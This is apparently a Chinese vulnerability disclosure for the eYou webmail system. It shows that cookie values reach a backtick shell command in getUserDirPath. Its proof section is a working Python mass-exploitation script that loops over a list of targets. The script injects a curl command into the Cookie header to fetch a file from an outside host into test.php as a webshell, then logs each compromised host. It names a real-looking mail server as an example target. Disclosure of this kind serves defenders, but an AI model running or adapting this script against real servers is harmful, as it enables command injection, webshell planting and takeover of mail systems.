### 简要描述:
这套系统还有很多问题,能登录就更多问题了。
### 详细说明:
user/storage_fold_explore.php
```
/**
* 用户网络存储目录列表
*
* 该页面显示登录邮箱用户的网络存储目录列表,选择后保存邮件附件到指定的目录中。
*
* @author FengHui
* @copyright 199902008 eYou.net
* @version storage_explore.php 2008/11/12
*/
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');
require_once(PATH.'inc/user.config.php');
$skin = getCookieUserValue('SKIN');
$uid = getCookieUserValue('UID');
$domain = getCookieUserValue('DOMAIN');
$user_dir_path = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path = $user_dir_path.'/storage/Data/';
$file_name = htmlspecialchars(get('file'));
$att = htmlspecialchars(get('att'));
?>
```
GetUser_DirPath在/inc/function.php下。
```
function getUserDirPath($uid, $domain) {
$cmd = "/var/eyou/sbin/hashid $uid $domain";
$path = `$cmd`;
$path = trim($path);
return $path;
}
```
### 漏洞证明:
利用代码:
```
__author__ = 'zengzhang'
import time,sys
import urllib,urllib2
from urlparse import urlparse
def Getwebshell(url):
url=url.strip()
header={"Cookie":"USER=UID%3d1|curl http://conqu3r.paxmac.org/test.txt>>test.php&DOMAIN%3d127.0.0.1"}
try:
request=urllib2.Request(url,None,headers=header)
rep=urllib2.urlopen(request)
except:
pass
Indentified(url)
def Readfile(filen):
fp=open(filen,'r')
for url in fp:
if url!='':
Getwebshell(url)
def Indentified(url):
url=url[:-19]
url=url+"test.php"
try:
f=urllib.urlopen(url).getcode()
if f==200:
fp=open("shell.txt","w+")
fp.write(url+"\n")
fp.close()
except:
pass
Readfile("url.txt")
```
url.txt内容为:http://mail.bjsasc.com/user/storage_fold_explore.php形式
[
](https://images.seebug.org/upload/201404/26113819905107dc893d244259c457ba88e324b3.png)
451
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
